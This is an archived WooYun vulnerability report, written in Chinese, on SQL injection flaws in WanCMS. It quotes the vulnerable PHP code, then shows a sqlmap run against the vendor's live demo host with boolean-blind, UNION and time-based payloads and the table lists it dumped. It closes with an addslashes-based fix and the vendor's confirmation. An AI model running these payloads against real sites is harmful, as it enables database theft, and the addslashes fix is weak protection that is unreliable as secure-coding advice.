乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-26: 细节已通知厂商并且等待厂商处理中 2014-01-28: 厂商已经确认,细节仅向厂商公开 2014-01-31: 细节向第三方安全合作伙伴开放 2014-03-24: 细节向核心白帽子及相关领域专家公开 2014-04-03: 细节向普通白帽子公开 2014-04-13: 细节向实习白帽子公开 2014-04-26: 细节向公众公开
WanCMS 多处SQL注射 已经在官网演示注射,可致使所有数据库信息泄露(仅演示至跑表,足矣)举一例分析,并给出通用的修复建议
举一例分析:/app/Lib/Action/AccountsAction.class.php line:570
//之前代码略,为 public function forget_password_s() $username = $_GET ['username']; //直接获取username,为什么不用框架封装的方法取得? $ucresult = uc_user_checkname ( $username ); if ($ucresult != '-3') { // Header("Location: /accounts/forget_password"); } //测试时使用的吧?没有用处 $this->assign ( 'username', $username ); $member = M ( 'member' ); $u_info = $member->where ( "username ='" . $username . "'" )->find (); //上面这句将username直接带入查询,引发了注射 $this->assign ( 'u_info', $u_info ); $this->assign ( 'username', $username );//之后代码略,与本漏洞无关
其他注射位置:/app/Lib/Action/LicenseAction.class.php 开头没几行
public function search(){ $domain = $_GET['domain']; $authorization = M("authorization"); // 实例化authorization对象 $info = $authorization->where("domain ='".$domain."'")->find(); if(empty($info)){ echo "document.write('<a href='http://demo.31wan.cn/license/'>未授权</a>')"; }else{ echo "document.write('已授权')"; } }
又是直接GET进查询语句,是不是都同样的道理呢?这样的注射还有很多,就不分开提交通知了下面进行sqlmap跑表,仅列出部分表名,理论上可以获取全部信息
演示:
C:\Users\Administrator>sqlmap.py -u "http://test4.31wan.cn/accounts/forget_password_s?username=lxj616" --tables
sqlmap identified the following injection points with a total of 59 HTTP(s) requests:---Place: GETParameter: username Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: username=lxj616') AND 3329=3329 AND ('MGNe'='MGNe Type: UNION query Title: MySQL UNION query (NULL) - 20 columns Payload: username=-5677') UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71756c7171,0x6a6546534662544b6c64,0x7168676871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: username=lxj616') AND SLEEP(5) AND ('vuGA'='vuGA---web application technology: Nginxback-end DBMS: MySQL 5.0.11Database: anzhuang[38 tables]+---------------------------------------+| mygame_activities || mygame_activitiestype || mygame_ad || mygame_ad_where || mygame_admin_exec_log || mygame_admin_login_error || mygame_admin_pay || mygame_admin_role || mygame_article || mygame_card || mygame_card_log || mygame_card_type || mygame_category || mygame_category_list || mygame_cps || mygame_first_recharge || mygame_game || mygame_game_log || mygame_gametype || mygame_link || mygame_manager || mygame_member || mygame_member_bank || mygame_member_extend_info || mygame_mobilegame || mygame_notice || mygame_pay_ok || mygame_pay_type || mygame_role || mygame_role_access || mygame_server || mygame_soical_login || mygame_spend_log || mygame_statistical || mygame_web_not_allow_ip || mygame_webconfig || mygame_websdk || mygame_yzdx |+---------------------------------------+Database: 3937[30 tables]+---------------------------------------+| mygame_ad || mygame_ad_where || mygame_admin_exec_log || mygame_admin_login_error || mygame_admin_pay || mygame_admin_role || mygame_article || mygame_card || mygame_card_log || mygame_category || mygame_category_list || mygame_cps || mygame_flash || mygame_game || mygame_game_log || mygame_gametype || mygame_link || mygame_manager || mygame_member || mygame_member_extend_info || mygame_menu || mygame_pay_ok || mygame_pay_type || mygame_role_access || mygame_server || mygame_soical_login || mygame_spend_log || mygame_statistical || mygame_web_not_allow_ip || mygame_webconfig |+---------------------------------------+Database: 31wanbbs[293 tables]+---------------------------------------+| pre_common_admincp_cmenu || pre_common_admincp_group || pre_common_admincp_member || pre_common_admincp_perm || pre_common_admincp_session || pre_common_admingroup || pre_common_adminnote || pre_common_advertisement || pre_common_advertisement_custom || pre_common_banned || pre_common_block || pre_common_block_favorite || pre_common_block_item || pre_common_block_item_data || pre_common_block_permission || pre_common_block_pic || pre_common_block_style || pre_common_block_xml || pre_common_cache || pre_common_card || pre_common_card_log || pre_common_card_type || pre_common_connect_guest || pre_common_credit_log || pre_common_credit_log_field || pre_common_credit_rule || pre_common_credit_rule_log || pre_common_credit_rule_log_field || pre_common_cron || pre_common_devicetoken || pre_common_district || pre_common_diy_data || pre_common_domain || pre_common_failedip || pre_common_failedlogin || pre_common_friendlink || pre_common_grouppm || pre_common_invite || pre_common_magic || pre_common_magiclog || pre_common_mailcron || pre_common_mailqueue || pre_common_member || pre_common_member_action_log || pre_common_member_connect || pre_common_member_count || pre_common_member_crime || pre_common_member_field_forum || pre_common_member_field_home || pre_common_member_forum_buylog || pre_common_member_grouppm || pre_common_member_log || pre_common_member_magic || pre_common_member_medal || pre_common_member_newprompt || pre_common_member_profile || pre_common_member_profile_setting || pre_common_member_security || pre_common_member_secwhite || pre_common_member_stat_field || pre_common_member_status || pre_common_member_validate || pre_common_member_verify || pre_common_member_verify_info || pre_common_myapp || pre_common_myinvite || pre_common_mytask || pre_common_nav || pre_common_onlinetime || pre_common_optimizer || pre_common_patch || pre_common_plugin || pre_common_pluginvar || pre_common_process || pre_common_regip || pre_common_relatedlink || pre_common_remote_port || pre_common_report || pre_common_searchindex || pre_common_seccheck || pre_common_secquestion || pre_common_session || pre_common_setting || pre_common_smiley || pre_common_sphinxcounter || pre_common_stat || pre_common_statuser || pre_common_style || pre_common_stylevar || pre_common_syscache || pre_common_tag || pre_common_tagitem || pre_common_task || pre_common_taskvar || pre_common_template || pre_common_template_block || pre_common_template_permission || pre_common_uin_black || pre_common_usergroup || pre_common_usergroup_field || pre_common_visit || pre_common_word || pre_common_word_type || pre_connect_disktask || pre_connect_feedlog || pre_connect_memberbindlog || pre_connect_postfeedlog || pre_connect_tthreadlog || pre_forum_access || pre_forum_activity || pre_forum_activityapply || pre_forum_announcement || pre_forum_attachment || pre_forum_attachment_0 || pre_forum_attachment_1 || pre_forum_attachment_2 || pre_forum_attachment_3 || pre_forum_attachment_4 || pre_forum_attachment_5 || pre_forum_attachment_6 || pre_forum_attachment_7 || pre_forum_attachment_8 || pre_forum_attachment_9 || pre_forum_attachment_exif || pre_forum_attachment_unused || pre_forum_attachtype || pre_forum_bbcode || pre_forum_collection || pre_forum_collectioncomment || pre_forum_collectionfollow || pre_forum_collectioninvite || pre_forum_collectionrelated || pre_forum_collectionteamworker || pre_forum_collectionthread || pre_forum_creditslog || pre_forum_debate || pre_forum_debatepost || pre_forum_faq || pre_forum_filter_post || pre_forum_forum || pre_forum_forum_threadtable || pre_forum_forumfield || pre_forum_forumrecommend || pre_forum_groupcreditslog || pre_forum_groupfield || pre_forum_groupinvite || pre_forum_grouplevel || pre_forum_groupuser || pre_forum_hotreply_member || pre_forum_hotreply_number || pre_forum_imagetype || pre_forum_medal || pre_forum_medallog || pre_forum_memberrecommend || pre_forum_moderator || pre_forum_modwork || pre_forum_newthread || pre_forum_onlinelist || pre_forum_order || pre_forum_poll || pre_forum_polloption || pre_forum_polloption_image || pre_forum_pollvoter || pre_forum_post || pre_forum_post_location || pre_forum_post_moderate || pre_forum_post_tableid || pre_forum_postcache || pre_forum_postcomment || pre_forum_postlog || pre_forum_poststick || pre_forum_promotion || pre_forum_ratelog || pre_forum_relatedthread || pre_forum_replycredit || pre_forum_rsscache || pre_forum_sofa || pre_forum_spacecache || pre_forum_statlog || pre_forum_thread || pre_forum_thread_moderate || pre_forum_threadaddviews || pre_forum_threadcalendar || pre_forum_threadclass || pre_forum_threadclosed || pre_forum_threaddisablepos || pre_forum_threadhidelog || pre_forum_threadhot || pre_forum_threadimage || pre_forum_threadlog || pre_forum_threadmod || pre_forum_threadpartake || pre_forum_threadpreview || pre_forum_threadprofile || pre_forum_threadprofile_group || pre_forum_threadrush || pre_forum_threadtype || pre_forum_trade || pre_forum_tradecomment || pre_forum_tradelog || pre_forum_typeoption || pre_forum_typeoptionvar || pre_forum_typevar || pre_forum_warning || pre_home_album || pre_home_album_category || pre_home_appcreditlog || pre_home_blacklist || pre_home_blog || pre_home_blog_category || pre_home_blog_moderate || pre_home_blogfield || pre_home_class || pre_home_click || pre_home_clickuser || pre_home_comment || pre_home_comment_moderate || pre_home_docomment || pre_home_doing || pre_home_doing_moderate || pre_home_favorite || pre_home_feed || pre_home_feed_app || pre_home_follow || pre_home_follow_feed || pre_home_follow_feed_archiver || pre_home_friend || pre_home_friend_request || pre_home_friendlog || pre_home_notification || pre_home_pic || pre_home_pic_moderate || pre_home_picfield || pre_home_poke || pre_home_pokearchive || pre_home_share || pre_home_share_moderate || pre_home_show || pre_home_specialuser || pre_home_userapp || pre_home_userappfield || pre_home_visitor || pre_mobile_setting || pre_mobileoem_member || pre_mobileoem_pushthreads || pre_portal_article_content || pre_portal_article_count || pre_portal_article_moderate || pre_portal_article_related || pre_portal_article_title || pre_portal_article_trash || pre_portal_attachment || pre_portal_category || pre_portal_category_permission || pre_portal_comment || pre_portal_comment_moderate || pre_portal_rsscache || pre_portal_topic || pre_portal_topic_pic || pre_security_evilpost || pre_security_eviluser || pre_security_failedlog || pre_ucenter_admins || pre_ucenter_applications || pre_ucenter_badwords || pre_ucenter_domains || pre_ucenter_failedlogins || pre_ucenter_feeds || pre_ucenter_friends || pre_ucenter_mailqueue || pre_ucenter_memberfields || pre_ucenter_members || pre_ucenter_mergemembers || pre_ucenter_newpm || pre_ucenter_notelist || pre_ucenter_pm_indexes || pre_ucenter_pm_lists || pre_ucenter_pm_members || pre_ucenter_pm_messages_0 || pre_ucenter_pm_messages_1 || pre_ucenter_pm_messages_2 || pre_ucenter_pm_messages_3 || pre_ucenter_pm_messages_4 || pre_ucenter_pm_messages_5 || pre_ucenter_pm_messages_6 || pre_ucenter_pm_messages_7 || pre_ucenter_pm_messages_8 || pre_ucenter_pm_messages_9 || pre_ucenter_protectedmembers || pre_ucenter_settings || pre_ucenter_sqlcache || pre_ucenter_tags || pre_ucenter_vars |+---------------------------------------+
使用你们自己框架带的安全函数
/** +---------------------------------------------------------- * 如果 magic_quotes_gpc 为关闭状态,这个函数可以转义字符串 +---------------------------------------------------------- * @access public +---------------------------------------------------------- * @param string $string 要处理的字符串 +---------------------------------------------------------- * @return string +---------------------------------------------------------- */ static public function addSlashes($string) { if (!get_magic_quotes_gpc()) { $string = addslashes($string); } return $string; } /** +---------------------------------------------------------- * 从$_POST,$_GET,$_COOKIE,$_REQUEST等数组中获得数据 +---------------------------------------------------------- * @access public +---------------------------------------------------------- * @param string $string 要处理的字符串 +---------------------------------------------------------- * @return string +---------------------------------------------------------- */ static public function getVar($string) { return Input::stripSlashes($string); } /** +---------------------------------------------------------- * 如果 magic_quotes_gpc 为开启状态,这个函数可以反转义字符串 +---------------------------------------------------------- * @access public +---------------------------------------------------------- * @param string $string 要处理的字符串 +---------------------------------------------------------- * @return string +---------------------------------------------------------- */ static public function stripSlashes($string) { if (get_magic_quotes_gpc()) { $string = stripslashes($string); } return $string; }
例:以第一个注射点为例进行修补
$username = addSlashes($_GET ['username']);...之后数据库中一律带着addSlashes接收...需要输出时(api、显示、或者就是需要原始数据)$username_out = stripSlashes($username);
建议仔细排查代码中类似的注射点,用合理的方法修复(以上方法仅供参考)
危害等级:中
漏洞Rank:10
确认时间:2014-01-28 13:46
厂商会尽快修改 真诚感谢lxj616
暂无